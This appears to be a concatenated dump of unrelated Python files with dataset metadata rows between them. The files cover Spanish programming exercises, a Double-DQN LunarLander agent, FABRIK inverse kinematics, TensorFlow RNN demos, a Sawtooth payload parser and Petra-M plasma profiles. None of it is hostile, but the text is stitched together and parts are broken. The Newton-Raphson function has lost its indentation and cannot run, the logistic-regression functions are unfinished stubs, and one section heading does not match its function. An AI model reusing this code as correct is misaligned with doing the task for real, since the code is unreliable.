            # TensorBoard logger and the predictor that ties it all together.
            logger = Logger(session, config)
            predictor = ExamplePredictor(session, model, loader, config, logger)
            # Restore weights if a checkpoint exists, then run prediction.
            model.load(session)
            predictor.predict()
def main():
    """Entry point: set TF logging verbosity and run the prediction pass."""
    tf.logging.set_verbosity(tf.logging.INFO)
    # predict
    predict()
    tf.logging.info("Congratulations!")
# Standard entry-point guard so importing this module does not start a run.
if __name__ == "__main__":
    main()
| true |
bbdc865b082b88cb6dd17540122d5e741dd2e6ea | Python | luisutr/Inform-tica-20-21 | /ruben/lab1.py | UTF-8 | 5,944 | 3.90625 | 4 | [] | no_license | # En este archivo deben estar definidas todas las funciones que se piden en el enunciado.
# Si trabajas con otros archivos (por ejemplo archivo1.py y archivo2.py) incluye las funciones de esos archivos en éste así:
# from archivo1 import *
# from archivo2 import *
#1:
##1.1.Primer múltiplo de un número: Implementa la función `primer_multiplo` que recibe como argumentos un número entero `n` y una lista `L`
# de números enteros y devuelve la posición del primer múltiplo de `n` que encuentre en la lista `L`. Si no hay ninguno debe devolver -1.
def primer_multiplo(n, L):
    """Return the index of the first multiple of n in L, or -1 if none.

    Uses enumerate instead of the original L.index(i), which rescanned the
    list for every hit (accidental O(n^2)).
    """
    for idx, value in enumerate(L):
        if value % n == 0:
            return idx
    return -1
##1.2. Función `concatena_lineas`: La función devuelve el resultado de concatenar todas las cadenas insertando un carácter terminador de línea tras cada línea.
def concatena_lineas(c):
    """Concatenate the strings in c, appending a newline after each one.

    str.join replaces the original repeated '+=', which is quadratic.
    """
    return "".join(linea + "\n" for linea in c)
##1.3. Probabilidad de coincidencia en la fecha de cumpleaños: Esta función debe devolver un número real que corresponde a la probabilidad de que
# al menos dos personas de un grupo de n personas cumplan años en el mismo día.
def prob_mismo_cumple(n):
    """Probability that at least two of n people share a birthday (365-day year).

    Computes 1 - prod_{k=1}^{n-1} (365-k)/365; the original's unused 'e = 0'
    initialization is removed.
    """
    p = 1.0
    for k in range(1, n):
        p *= (365 - k) / 365
    return 1 - p
##1.4.Suma de serie:
def suma_serie(n):
    """Partial sum of the Basel series: sum_{k=1}^{n} 1/k**2; 0 when n < 1."""
    if n < 1:
        return 0  # guard clause, matching the original's else branch
    # int(n) truncates, matching the original 'while e <= n' float loop.
    return sum(1 / k ** 2 for k in range(1, int(n) + 1))
##1.5. Números feos: Admite como argumento una secuencia de números enteros. La función debe devolver el primer número feo de la secuencia o bien `None` si no contiene ninguno.
def primer_feo(L):
    """Return the first 'ugly' number in L, or None if there is none."""
    return next((x for x in L if feo(x)), None)
def feo(n):
    """Return True if n is 'ugly': n > 1 with no prime factors other than 2, 3, 5."""
    if n < 2:
        return False  # guard: divide() looped forever on n == 0; 1 is excluded by spec
    for d in (2, 3, 5):
        n = divide(n, d)
    return n == 1
def divide(n, d):
    """Strip every factor d out of n.

    n == 0 is returned unchanged: the original spun forever because
    0 % d == 0 and 0 // d == 0.
    """
    if n == 0:
        return 0
    while n % d == 0:
        n //= d
    return n
##1.6.Suma de dígitos: Devuelve un número entero de una sola cifra, resultante de sumar los dígitos del número mientras el resultado tenga más de un dígito.
import math
def suma_digitos(numero):
    """Repeatedly sum the decimal digits of numero until one digit remains.

    The original extracted digits with float division and math.floor and hung
    on exact powers of ten (its 'resto > 1' loop undercounted the digits of
    10, 100, ...); summing the digits of str(numero) is exact and simple.
    """
    while numero >= 10:
        numero = sum(int(ch) for ch in str(numero))
    return numero
##1.7.Números persistentes:
import math
def en_mandelbrot(x, y):
    """Return True if c = x + y*i appears to lie in the Mandelbrot set.

    Iterates z -> z**2 + c up to 80 times; escape (|z| > 2) proves the point
    is outside, otherwise it is assumed inside.
    """
    c = complex(x, y)  # hoisted: the constant c was rebuilt on every iteration
    z = 0
    for _ in range(80):
        z = z ** 2 + c
        if abs(z) > 2:
            return False
    return True
##1.8.Números persistentes:
import math
def primer_persistente(p):
    """Return the smallest number whose multiplicative persistence is p.

    Persistence = number of times the digits must be multiplied together
    until a single digit remains. The original extracted digits via float
    division/math.floor (precision-fragile for large numbers); string
    digits are exact. For p == 0 this returns 9, as before.
    """
    def _persistencia(num):
        # Count multiply-digits steps until num is a single digit.
        steps = 0
        while num >= 10:
            prod = 1
            for ch in str(num):
                prod *= int(ch)
            num = prod
            steps += 1
        return steps

    g = 9
    while _persistencia(g) != p:
        g += 1
    return g
##1.9.Cuadrones fuertes:
from math import sqrt
def primer_cuadron_fuerte():
    """Return the first 'strong cuadron' below 100000, or None if absent.

    Fix: the original called the misspelled name 'cuadron_fuerte8', which
    raised NameError on the first iteration.
    """
    for e in range(100000):
        if cuadron_fuerte(e):
            return e
def cuadron_fuerte(e):
    """True if e starts with digit 1, is a perfect square, and replacing that
    leading 1 with a 2 also yields a perfect square."""
    digits = str(e)
    if not digits.startswith("1"):
        return False
    twin = int("2" + digits[1:])
    return raiz(e) and raiz(twin)
def raiz(x):
    """Return True if x is a perfect square.

    Uses math.isqrt for an exact integer check: the original's
    sqrt(x) % 1 == 0 relies on float precision and misclassifies large
    squares. Non-integers and negatives return False.
    """
    from math import isqrt  # local import keeps the block self-contained
    n = int(x)
    if n != x or n < 0:
        return False
    return isqrt(n) ** 2 == n
##1.10.Números ondulantes:
def es_ondulante(n):
    """Return True if n is an undulating number: its decimal digits strictly
    alternate between rising and falling (e.g. 1212 or 2121).

    Fixes the original check, which only required one parity class of
    differences to be negative and therefore accepted monotone numbers
    such as 1234.
    """
    digits = [int(ch) for ch in str(n)]
    diffs = [a - b for a, b in zip(digits, digits[1:])]
    if any(d == 0 for d in diffs):
        return False  # equal neighbours never undulate
    # Consecutive differences must have opposite signs.
    return all(d1 * d2 < 0 for d1, d2 in zip(diffs, diffs[1:]))
##2.1.Derivación de polinomios: Esta funcion calcula la derivada del polinomio que se pasa como argumento.
pol1 = [2, 5, 2, 1]  # sample polynomial 2 + 5x + 2x^2 + x^3 (ascending powers)
def polyder(pol):
    """Derivative of a polynomial given as ascending-power coefficients.

    Returns [0] for a constant so the result is always a valid coefficient
    list: the original returned the bare int 0, which polyval cannot
    evaluate (root_newton_raphson would crash on it).
    """
    if len(pol) == 1:
        return [0]
    return [k * c for k, c in enumerate(pol)][1:]
##2.2.Evaluación de polinomios: Esta funcion evalúa un polinomio `p` para un valor de `x` indicado como segundo argumento.
pol2 = [0, 1, 1]  # sample polynomial x + x^2
var = 3           # sample evaluation point
def polyval(pol, var):
    """Evaluate polynomial pol (ascending-power coefficients) at var."""
    return sum(coef * var ** power for power, coef in enumerate(pol))
##2.3.Teorema de Bolzano: (Es un teorema sobre funciones continuas reales definidas sobre un intervalo.
#Intuitivamente, el resultado afirma que, si una función es continua en un intervalo, entonces toma todos los valores intermedios comprendidos entre
#los extremos del intervalo) Utilizamos este teorema para aplicar el método de bisección para calcular una raiz mediante una función `root_bolzano`.
def rng(minimo, maximo):
    """Return a uniform random float between minimo and maximo."""
    from random import uniform
    return uniform(minimo, maximo)
def root_bolzano(pol):
    """Find a root of pol by randomized bisection (Bolzano's theorem).

    Brackets the search in [-2*max(pol), 2*max(pol)] (absolute value) and
    shrinks the bracket around random interior points until |p(x)| <= 1e-7.

    Fix: the original loop fell off the end without a return statement and
    always produced None.
    """
    x1 = -abs(max(pol)) * 2
    x2 = abs(max(pol)) * 2
    xa = rng(x1, x2)
    while abs(polyval(pol, xa)) > 1e-7:
        xa = rng(x1, x2)
        if polyval(pol, x1) * polyval(pol, xa) < 0:
            x2 = xa  # sign change in [x1, xa]: keep that half
        else:
            x1 = xa  # otherwise continue in [xa, x2]
    return xa
##2.4.Newton-Raphson general: Se usa la función para encontrar una raiz cualquiera de un polinomio que se indica como primer argumento con un margen de error que se indica como segundo argumento.
def root_newton_raphson(pol,epsilon):
x1 = -abs(max(pol))*2
x2 = abs(max(pol))*2
xa = rng(x1, x2)
for n in range(0,1000):
if abs(polyval(pol, xa)) < epsilon:
return xa
if polyval(polyder(pol), xa) == 0:
return None
xa = xa - polyval(pol, xa)/polyval(polyder(pol), xa)
return None
| true |
a5cd367b4265dd9d44deaa4281ee7df3390373f0 | Python | www744/rl_impl | /ddqn2.py | UTF-8 | 6,419 | 2.59375 | 3 | [
"MIT"
] | permissive | # -*- coding: utf-8 -*-
import os
import random
import gym
import numpy as np
from collections import deque
import tensorflow as tf
import tensorflow.keras as keras
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from tensorflow.keras.optimizers import Adam
from tensorflow.keras import backend as K
import logging
import sendmail
"""
Author: Spade
@Time : 2020/5/5
@Email: spadeaiverxin@163.com
"""
EPISODES = 1000
class DQNAgent:
    """Double-DQN agent: the online network selects actions, a periodically
    synced target network evaluates them, and transitions are replayed from
    a large ring buffer (the run description in info() calls this DDQN)."""
    def __init__(self, state_size, action_size):
        # Environment interface sizes.
        self.state_size = state_size
        self.action_size = action_size
        # Replay buffer; oldest transitions are evicted past 1M entries.
        self.memory = deque(maxlen=1000000)
        self.gamma = 0.99    # discount rate
        self.epsilon = 1.0  # exploration rate
        self.epsilon_min = 0.01
        self.epsilon_decay = 0.99
        self.learning_rate = 0.001
        # Online and target networks start with identical weights.
        self.model = self._build_model()
        self.target_model = self._build_model()
        self.update_target_model()
        self.batch_size = 64
    """Huber loss for Q Learning
    References: https://en.wikipedia.org/wiki/Huber_loss
            https://www.tensorflow.org/api_docs/python/tf/keras/losses/Huber
    """
    def _build_model(self):
        """Build and compile the Q-network: two 1000-unit ReLU layers and a
        linear head with one output per action (MSE loss, Adam optimizer)."""
        # Neural Net for Deep-Q learning Model
        model = Sequential()
        model.add(Dense(1000, input_dim=self.state_size, activation='relu'))
        model.add(Dense(1000, activation='relu'))
        model.add(Dense(self.action_size, activation='linear'))
        model.compile(loss='mse',
                      optimizer=Adam(lr=self.learning_rate))
        return model
    def update_target_model(self):
        """Sync the target network with the online network."""
        # copy weights from model to target_model
        self.target_model.set_weights(self.model.get_weights())
    def memorize(self, state, action, reward, next_state, done):
        """Append one (s, a, r, s', done) transition to the replay buffer."""
        self.memory.append((state, action, reward, next_state, done))
    def act(self, state):
        """Epsilon-greedy action: random with probability epsilon, otherwise
        the argmax of the online network's Q-values for this state."""
        if np.random.rand() <= self.epsilon:
            return random.randrange(self.action_size)
        act_values = self.model.predict(state)
        return np.argmax(act_values[0])  # returns action
    def replay(self, batch_size):
        """One Double-DQN training step on a random minibatch.

        The online network picks the argmax action for each next state and
        the target network supplies that action's value; terminal
        transitions keep the raw reward (the (1 - dones) mask). Epsilon is
        decayed after every step.
        NOTE(review): implicitly returns None even though the training loop
        stores the result as 'loss'.
        """
        minibatch = random.sample(self.memory, batch_size)
        states = np.array([i[0] for i in minibatch])
        actions = np.array([i[1] for i in minibatch])
        rewards = np.array([i[2] for i in minibatch])
        next_states = np.array([i[3] for i in minibatch])
        dones = np.array([i[4] for i in minibatch])
        states = np.squeeze(states)
        next_states = np.squeeze(next_states)
        # a: batch size x 4
        actions_temp = self.model.predict_on_batch(next_states)
        actions_temp = np.argmax(actions_temp,axis=1) # bach size
        target_f = self.model.predict_on_batch(states) # batch size x 4
        # t: batch size x 4
        t = self.target_model.predict_on_batch(next_states)
        ind = [i for i in range(batch_size)]
        t = t[ind,actions_temp]
        target = rewards + self.gamma * t * (1-dones)
        target_f[ind, actions] = target
        self.model.fit(states,target_f,epochs=1,verbose=0)
        if self.epsilon > self.epsilon_min:
            self.epsilon *= self.epsilon_decay
    def load(self, name):
        """Load network weights from the given checkpoint path."""
        self.model.load_weights(name)
    def save(self, name):
        """Save network weights to the given checkpoint path."""
        self.model.save_weights(name)
    def info(self):
        """One-line description of the run configuration for logs."""
        return "INFO: DDQN, Random off, seed(0)" + \
               "batch size:" + str(self.batch_size)+ \
               "learning rate:" + str(self.learning_rate)
if __name__ == "__main__":
    logFileName = './logging.txt'
    env = gym.make('LunarLander-v2')
    # Fixed seeds for reproducibility (matches agent.info()).
    env.seed(0)
    np.random.seed(0)
    state_size = env.observation_space.shape[0]
    action_size = env.action_space.n
    agent = DQNAgent(state_size, action_size)
    done = False
    logging.basicConfig(filename=logFileName, filemode='w', level=logging.INFO, format='%(asctime)s - %(message)s',
                        datefmt='%d-%b-%y %H:%M:%S')
    print(agent.info())
    logging.info(agent.info())
    checkpoint_dir = './checkpoint_ddqn/'
    # Fix: maxNum must exist even when resuming fails (e.g. the checkpoint
    # directory is missing and os.listdir raises). The original assigned it
    # inside the try block, so 'e = maxNum' below crashed with a NameError.
    maxNum = 0
    try:
        # Resume from the highest-numbered checkpoint, if any.
        fileList = os.listdir(checkpoint_dir)
        for f in fileList:
            if maxNum < int(f):
                maxNum = int(f)
        agent.load(checkpoint_dir + str(maxNum))
        agent.epsilon = 0.01  # resume with a mostly-greedy policy
        print("load the chekpoint of {}".format(maxNum))
    except Exception as err:
        print('no backup')
    done = False
    loss = 0.1
    e = maxNum
    while e < EPISODES:
        e += 1
        state = env.reset()
        state = np.reshape(state, [1, state_size])
        # Progress e-mails at 30/60/90% of the training run.
        # NOTE(review): total_reward is first assigned further down, so
        # resuming exactly one episode before a milestone would hit an
        # unbound name — confirm whether resumed runs can start there.
        if e == int(EPISODES * 0.3):
            sendmail.send('30% finished!, reward:' + str(total_reward))
        if e == int(EPISODES * 0.6):
            sendmail.send('60% finished, reward:' + str(total_reward))
        if e == int(EPISODES * 0.9):
            sendmail.send('90 finished, reward:' + str(total_reward))
        if e % 10 == 0:
            agent.save(checkpoint_dir + str(e))
            print('check point{}'.format(e))
        total_reward = 0
        for time in range(1000):
            # env.render()
            # decide action
            # action: 0 none , 1 right , 2 down, 3 left
            action = agent.act(state)
            # do the action and get reaction
            next_state, reward, done, _ = env.step(action)
            total_reward += reward
            # reward
            # reward = reward if not done else -100
            next_state = np.reshape(next_state, [1, state_size])
            # memorize this anction and the real state return from env
            agent.memorize(state, action, reward, next_state, done)
            state = next_state
            if done:
                print("episode: {}/{}, step: {} - e: {:.2} - coordinate:{:.3},{:.3} - reward:{:.5}"
                      .format(e, EPISODES, time, agent.epsilon, state[0, 0], state[0, 1], total_reward))
                logging.info("episode: {}/{} - step: {}, e: {:.2} - coordinate:{:.3},{:.3} - reward:{:.5}"
                             .format(e, EPISODES, time, agent.epsilon, state[0, 0], state[0, 1], total_reward))
                break
            if len(agent.memory) > agent.batch_size:
                loss = agent.replay(agent.batch_size)
        agent.update_target_model()
        agent.save("./train_output/weights.h5")
    sendmail.send('Dear sir, the'
                  ' training mission has finished, please check it ^_^')
26f174c77a51076f17c02e29a88199a207a01f8d | Python | sakshi-dhamija/IntroToRobotics | /assign5.py | UTF-8 | 2,308 | 3.3125 | 3 | [] | no_license | # 3 link RRR planar manipulator
import numpy as np
import math
from operator import add, sub
def euclidean(lst1, lst2):
    """Euclidean distance between two equal-length coordinate sequences.

    Single zip pass; the original built two intermediate lists via
    map(operator.sub, ...) and a squaring comprehension.
    """
    return math.sqrt(sum((b - a) ** 2 for a, b in zip(lst1, lst2)))
def scalarMul(scalar, list):
    """Return a new list with every element of the sequence multiplied by scalar.

    NOTE(review): the second parameter shadows the built-in ``list``; the
    name is kept to preserve the existing call signature.
    """
    return [scalar * element for element in list]
# --- FABRIK inverse kinematics for a 3-link planar RRR manipulator ---
# Read the base, two joints and end effector ("x y" per line) from stdin.
inital_position = np.zeros(shape=(4, 2))
print("Enter initial position of manipulator and end effector")
for i in range(4):
    print("Enter {} coordinate: ".format(i + 1))
    inital_position[i][0], inital_position[i][1] = list(map(float, input().split()))
goal = list(map(float, input("Enter coordinates of goal: ").split()))
print("iteration begins.....")
# Fixed link lengths are the initial distances between consecutive joints.
link_lengths = []
tol = 0.01  # stop once the end effector is this close to the goal
for i in range(inital_position.shape[0] - 1):
    link_lengths.append(euclidean(inital_position[i + 1], inital_position[i]))
diff = euclidean(goal, inital_position[0])
itr = 0
if (diff > sum(link_lengths)):
    # Goal farther than the total reach: stretch the arm straight toward it.
    print("not reachable")
    for i in range(inital_position.shape[0] - 1):
        # finding distance between target and join
        r = euclidean(goal, inital_position[i])
        lamb = link_lengths[i] / r
        # Place the next joint on the joint->goal segment at the link length.
        inital_position[i + 1] = list(map(add, ((1 - lamb) * inital_position[i]), scalarMul(lamb, goal)))
    print(inital_position[3])
else:
    # if the target is reachable
    b = np.copy(inital_position[0])  # remember the fixed base position
    curr_tol = euclidean(goal, inital_position[3])
    while (curr_tol > tol):
        # Backward pass: pin the end effector to the goal, walk toward base.
        inital_position[3] = goal
        # Traveling backward
        for i in range(inital_position.shape[0] - 2, -1, -1):
            r = euclidean(inital_position[i + 1], inital_position[i])
            lamb = link_lengths[i] / r
            inital_position[i] = list(
                map(add, (1 - lamb) * inital_position[i + 1], scalarMul(lamb, inital_position[i])))
        # Forward pass: re-pin the base, walk back out to the end effector.
        inital_position[0] = b
        for i in range(inital_position.shape[0] - 1):
            r = euclidean(inital_position[i + 1], inital_position[i])
            lamb = link_lengths[i] / r
            inital_position[i + 1] = list(
                map(add, (1 - lamb) * inital_position[i], scalarMul(lamb, inital_position[i + 1])))
        curr_tol = euclidean(goal, inital_position[3])
        itr += 1
        print("iteration: ", itr)
        print(curr_tol)
        print(inital_position[3])
52bf6efe0b20cf24fc47b2844e37af055dbc1765 | Python | dlambright/stats-reader | /LogReg.py | UTF-8 | 1,542 | 2.640625 | 3 | [] | no_license | import numpy as np
from scipy.special import expit
def mapFeature(X1, X2):
    # NOTE(review): unfinished stub — 'degree' and 'out' are set up but the
    # polynomial feature expansion is never built and the function implicitly
    # returns None. Presumably X1 is 2-D (it indexes X1.shape[1]) — confirm.
    degree = 6
    out = np.ones([X1.shape[1],1], dtype = float)
def sigmoid(matrix):
    """Element-wise logistic sigmoid 1 / (1 + exp(-x)) via scipy's expit."""
    return expit(matrix)
def getYInverse(y):
    """Return a flipped copy of the label vector y (1 -> 0, anything else -> 1).

    Works on a copy: the original flipped y in place, so a caller holding y
    (see getCostFunctionJ) silently had its labels inverted and ended up
    using the same flipped array for both y and its complement.
    """
    out = y.copy()
    for i in range(out.shape[0]):
        out[i] = 0 if out[i] == 1 else 1
    return out
def getCostFunctionGradient(theta, X, y):
    """Gradient of the logistic-regression cost: X' (h - y) / m.

    Per the original's debug notes the expected np.matrix shapes are
    theta (n, 1), X (m, n), y (m, 1); '*' is matrix multiplication here.
    """
    num_samples = y.shape[0]
    hypothesis = sigmoid(X * theta)
    return (X.transpose() * (hypothesis - y)) / num_samples
def getCostFunctionJ(theta, X, y):
    """Average log-likelihood term (y' log h + (1-y)' log(1-h)) / m, printed
    and returned.

    Fixes two defects: the label complement is now computed as 1 - y without
    mutating y (getYInverse flipped y in place, so y and yInverse were the
    same flipped array), and the Python 2 'print J' statement is replaced by
    a call that works on both Python 2 and 3.
    NOTE(review): the conventional cost is the *negative* of this value —
    confirm before using it for minimization.
    """
    m = y.shape[0]
    h = sigmoid(X * theta)
    yInverse = 1 - y  # complement of 0/1 labels, y left untouched
    J = ((y.transpose() * np.log(h)) + (yInverse.transpose() * np.log(1 - h))) / m
    print(J)
    return J
def logisticRegression(theta, alpha, X, y):
    # NOTE(review): broken stub — m is the *shape tuple*, not a sample count,
    # so alpha/m raises TypeError; the update ignores the gradient and nothing
    # is returned. A gradient-descent step appears to have been intended.
    m = y.shape
    theta = theta - (alpha/m)
def costFunctionReg(theta, X, y, lambdaa):
    # NOTE(review): placeholder — the commented block below is Octave/Matlab
    # pseudocode for the regularized logistic cost and gradient; the function
    # currently returns the constant 0.5 regardless of its inputs.
    # J = 0;
    # grad = zeros(size(theta));
    #
    # h = sigmoid(X * theta);#
    # J = (-1/m) * ((y.transpose() * log(h)) + (!y.transpose() * log(1-h))) + ((lambdaa/(2*m)) * sum(theta([2:rows(theta)]).^2));
    # theta(1) = 0;
    # grad = (1/m * (X'*(h-y))) + ((lambda/m) * theta); %theta([2:rows(theta)]));
    return .5
| true |
a0ce82227375faf4209921a6408038e43dc9b175 | Python | zuobangbang/workspace | /tensorflow---/rnn/rnn.py | UTF-8 | 2,843 | 2.9375 | 3 | [] | no_license | #单层rnn
import tensorflow as tf
import numpy as np
# n_steps = 2
# n_inputs = 3
# n_neurons = 5
#
# X = tf.placeholder(tf.float32, [None, n_steps, n_inputs])
# basic_cell = tf.contrib.rnn.BasicRNNCell(num_units=n_neurons)
#
# seq_length = tf.placeholder(tf.int32, [None])
# outputs, states = tf.nn.dynamic_rnn(basic_cell, X, dtype=tf.float32,
# sequence_length=seq_length)
#
# init = tf.global_variables_initializer()
#
# X_batch = np.array([
# # step 0 step 1
# [[0, 1, 2], [9, 8, 7]], # instance 1
# [[3, 4, 5], [0, 0, 0]], # instance 2 (padded with zero vectors)
# [[6, 7, 8], [6, 5, 4]], # instance 3
# [[9, 0, 1], [3, 2, 1]], # instance 4
# ])
# seq_length_batch = np.array([2, 1, 2, 2])
#
# with tf.Session() as sess:
# init.run()
# outputs_val, states_val = sess.run(
# [outputs, states], feed_dict={X: X_batch, seq_length: seq_length_batch})
# print("outputs_val.shape:", outputs_val.shape, "states_val.shape:", states_val.shape)
# print("outputs_val:", outputs_val, "states_val:", states_val)
#多层rnn
import numpy as np
# Hyper-parameters for the toy multi-layer RNN demo.
n_steps = 2
n_inputs = 3
n_neurons = 5
n_layers = 3
# Placeholders: X carries (batch, time, features); seq_length gives the true
# length of each sequence so dynamic_rnn can skip the zero padding.
X = tf.placeholder(tf.float32, [None, n_steps, n_inputs])
seq_length = tf.placeholder(tf.int32, [None])
# Stack n_layers ReLU RNN cells into a single multi-layer cell.
layers = [tf.contrib.rnn.BasicRNNCell(num_units=n_neurons,
                                      activation=tf.nn.relu)
          for layer in range(n_layers)]
multi_layer_cell = tf.contrib.rnn.MultiRNNCell(layers)
outputs, states = tf.nn.dynamic_rnn(multi_layer_cell, X, dtype=tf.float32, sequence_length=seq_length)
init = tf.global_variables_initializer()
X_batch = np.array([
    # step 0     step 1
    [[0, 1, 2], [9, 8, 7]], # instance 1
    [[3, 4, 5], [0, 0, 0]], # instance 2 (padded with zero vectors)
    [[6, 7, 8], [6, 5, 4]], # instance 3
    [[9, 0, 1], [3, 2, 1]], # instance 4
])
seq_length_batch = np.array([2, 1, 2, 2])
with tf.Session() as sess:
    init.run()
    outputs_val, states_val = sess.run(
        [outputs, states], feed_dict={X: X_batch, seq_length: seq_length_batch})
    # NOTE(review): the first print is labelled "...shape" but actually
    # prints the symbolic tensors, not the evaluated shapes.
    print("outputs_val.shape:", outputs, "states_val.shape:", states)
    print("outputs_val:", outputs_val)
    print("states_val:", states_val)
# Mini accuracy-computation demo: element-wise equality of two matrices,
# cast the booleans to floats, then average to get the match fraction.
import tensorflow as tf
a = [[1,2,3],[4,3,6]]
b = [[1,0,3],[1,5,1]]
with tf.Session() as sess:
    print(sess.run(tf.equal(a,b)))
    print(sess.run(tf.cast(tf.equal(a, b),tf.float32)))
    print(sess.run(tf.reduce_mean(tf.cast(tf.equal(a, b), tf.float32))))
#多层rnn
# words = tf.placeholder(tf.int32, [batch_size, num_steps])
# lstm = rnn_cell.BasicLSTMCell(lstm_size)
# stacked_lstm = rnn_cell.MultiRNNCell([lstm] * number_of_layers)
# initial_state = stacked_lstm.zero_state(batch_size, tf.float32)
# outputs, state = tf.nn.dynamic_rnn(stacked_lstm, inputs= words, initial_state = init_state) | true |
46c4540d948d693622bf18ac86f550afa63801c8 | Python | beachcoder25/Interview-Questions | /stringManipulation/1.10 - Binary to String/binaryFlip.py | UTF-8 | 433 | 3.6875 | 4 | [] | no_license | import math
def complement(n):
s = ''
i = math.floor(math.log(n, 2))
while n > 0:
if 2**i <= n:
s += '1'
n -= 2**i
else:
s += '0'
i -= 1
for x in range(i+1):
s += '0'
print('Binary:', s)
comp = 0
for i in range(len(s)):
if s[len(s)-i-1] == '0':
comp += 2**(i)
return comp
# Demo: print the bit-complement of 10 (0b1010 -> 5).
n = 10
print(complement(n))
| true |
80ce571fb67484dbc990b12e2f2d138f5a5570c0 | Python | annakuchko/DataEngineering | /Python-Basics/HW2_types/2.py | UTF-8 | 754 | 4.09375 | 4 | [] | no_license | # 2. Для списка реализовать обмен значений соседних элементов, т.е. Значениями
# обмениваются элементы с индексами 0 и 1, 2 и 3 и т.д. При нечетном количестве
# элементов последний сохранить на своем месте. Для заполнения списка элементов
# необходимо использовать функцию input().
my_list = (input('Input elements of list separated by comma')).split(',')
if len(my_list)//2==0:
r = len(my_list)
else:
r = len(my_list)-1
for i in range(0,r,2):
my_list[i], my_list[i+1] = my_list[i+1], my_list[i]
print(my_list)
| true |
cafdbbb2863fb05c8deaff35362f0eeedd4deb2e | Python | theblackhawk2/Scalian-Blockchain | /Sawtooth_Project/Assets/Assets_tp/asset_payload.py | UTF-8 | 1,200 | 2.796875 | 3 | [] | no_license | from sawtooth_sdk.processor.exceptions import InvalidTransaction
class AssetPayload:
def __init__(self, payload):
try:
#Make the format of the payload , csv utf-8 encoded
name, serie, action, new_owner = payload.decode().split(',')
except ValueError:
raise InvalidTransaction("[-] Encodage de payload incorrect !")
if not serie:
raise InvalidTransaction("[-] Nom de bien requis ")
if not action:
raise InvalidTransaction("[-] Action requise")
if action not in ('create', 'transfer','destroy'):
raise InvalidTransaction("[-] L'action choisie est invalide")
if action == "transfer":
if new_owner is None:
raise InvalidTransaction("[-] Renseignez un destinataire pour recevoir le bien")
self._name = name
self._serie = serie
self._action = action
self._new_owner = new_owner
@staticmethod
def from_bytes(payload):
return AssetPayload(payload = payload)
@property
def name(self):
return self._name
@property
def serie(self):
return self._serie
@property
def action(self):
return self._action
@property
def new_owner(self):
return self._new_owner
| true |
621746300401d1961c4772f1c1b634598907a44a | Python | kunalsanwalka/bapsf_test_files | /tokamak_plasma_ns_18.py | UTF-8 | 10,075 | 2.890625 | 3 | [] | no_license | """
This program is a copy of the tokamak_plasma_ns.py file that is used in the Petra-M simulations.
The number at the end of the file indicates which test_geom it was taken from.
The following lines are commented out as they are only useful/available when working with Petra-M
from petram.helper.variables import variable
@variable.array(complex = True, shape=(3,3))
NOTE: Check the following things when sending the file back to solver-
1. Uncomment the lines mentioned above (THE PROGRAM WILL NOT RUN WITHOUT THIS STEP).
2. Remove any print or plot lines from the functions as I am not sure how the solver handles these issues.
3. If possible, only edit one function at a time and test by runnning a simulation.
4. Comment out/delete the line which defines the frequency (THIS OVERRIDES THE VALUE DEFINED IN THE MODEL EDITOR)
"""
import numpy as np
import matplotlib.pyplot as plt
#from petram.helper.variables import variable
#Variables imported from the model description
#freq: Frequency of the antenna (fundamental frequency at which the simulation is being solved
freq=250*1000#KHz
#Equilibrium Values (help define the density function)
fwhm=0.3 #FWHM
bMag0=0.05 #Magnetic Field Strength
a=15 #Steepness of the dropoff
#Simulation Constants
w=freq*2*np.pi #Angular frequency of the antenna
#Universal Constants
eps_0=8.85418782e-12 #Vacuum Permittivity
q_e=-1.60217662e-19 #Electron Charge
q_p=1.60217662e-19 #Proton Charge
m_e=9.10938356e-31 #Electron Mass
m_amu=1.66053906660e-27 #Atomic Mass Unit
def Bfield(x, y, z):
    """Magnetic field vector used in the wave solve at (x, y, z).

    Currently a uniform 0.1 T (1 kG) axial field along z; values are in
    tesla.
    """
    return [0, 0, 0.1]
def magneticField(x, y, z):
    """Axial field profile used only by density().

    Bz ramps smoothly via a tanh centred at z = 0, from 0.05 T (500 G) at
    z -> -inf to 0.16 T (1600 G) at z -> +inf; transverse components are
    zero. Kept separate from Bfield() so density and field strength can be
    treated as independent variables.
    """
    bz = (0.11 / 2) * (np.tanh(z) + 1) + 0.05
    return [0, 0, bz]
def Bnorm(x, y, z, forDens=False):
    """Magnitude of the magnetic field at (x, y, z).

    When forDens is True the density-profile field magneticField() is used
    instead of the wave-solve field Bfield().
    """
    if forDens == True:
        Bx, By, Bz = magneticField(x, y, z)
    else:
        Bx, By, Bz = Bfield(x, y, z)
    return np.sqrt(Bx ** 2 + By ** 2 + Bz ** 2)
def densityConst(x, y, z):
    """Plasma density with a radial tanh profile and no axial variation.

    Debugging profile: peak 1e18 m^-3 on axis, falling off around r = fwhm
    with steepness a (both module-level constants).
    """
    densBase = 1e18
    r = np.sqrt(x ** 2 + y ** 2)
    return densBase * (np.tanh(-a * (r - fwhm)) + 1) / 2
def density(x,y,z):
    """
    Calculates the density of the plasma at a given point
    Args:
        x,y,z: Position at which we need to calculate the density (float)
    Returns:
        dens: Density of the plasma at a given (x,y,z) (float)
    """
    #Base Case
    dens=0
    #Base Density
    densBase=1e18
    #Magnetic Field magnitude
    bMag=Bnorm(x,y,z)
    # NOTE(review): Bnorm is called without forDens=True, so this uses the
    # wave-solve Bfield() rather than magneticField(), even though
    # magneticField's docstring says it exists for density() — confirm.
    #Radial Distance
    r=np.sqrt(x**2+y**2)
    #Mirror ratio
    mRatio=np.sqrt(bMag/bMag0)
    #Density
    dens=densBase*(np.tanh(-a*(mRatio*r-fwhm))+1)/2
    #Rescale density so that we maintain the same number of particles
    #Based on an analytical integral of the radial density function
    #Integration limit
    intLim=10
    #Numerator
    coshVal=np.cosh(a*(fwhm+intLim/mRatio))
    sechVal=1/np.cosh(a*(fwhm-intLim/mRatio))
    num=np.log(coshVal*sechVal)
    #Denominator
    coshVal=np.cosh(a*(fwhm+intLim))
    sechVal=1/np.cosh(a*(fwhm-intLim))
    den=np.log(coshVal*sechVal)
    #Rescale
    rescaleFac=num/(den*mRatio)
    dens/=rescaleFac
    return dens
def collisionality(x, y, z):
    """Collisionality at a point in the plasma.

    Flat 4 MHz baseline for |z| <= 9 m, then a quadratic ramp (1e8 per
    metre^2 past the edge) so the wave energy is absorbed before it reaches
    the end walls.
    """
    base = 4 * 1e6  # MHz-scale baseline
    if -9 <= z <= 9:
        return base
    # Symmetric quadratic ramp beyond either end of the uniform region.
    overshoot = abs(z) - 9
    return base + 1e8 * overshoot ** 2
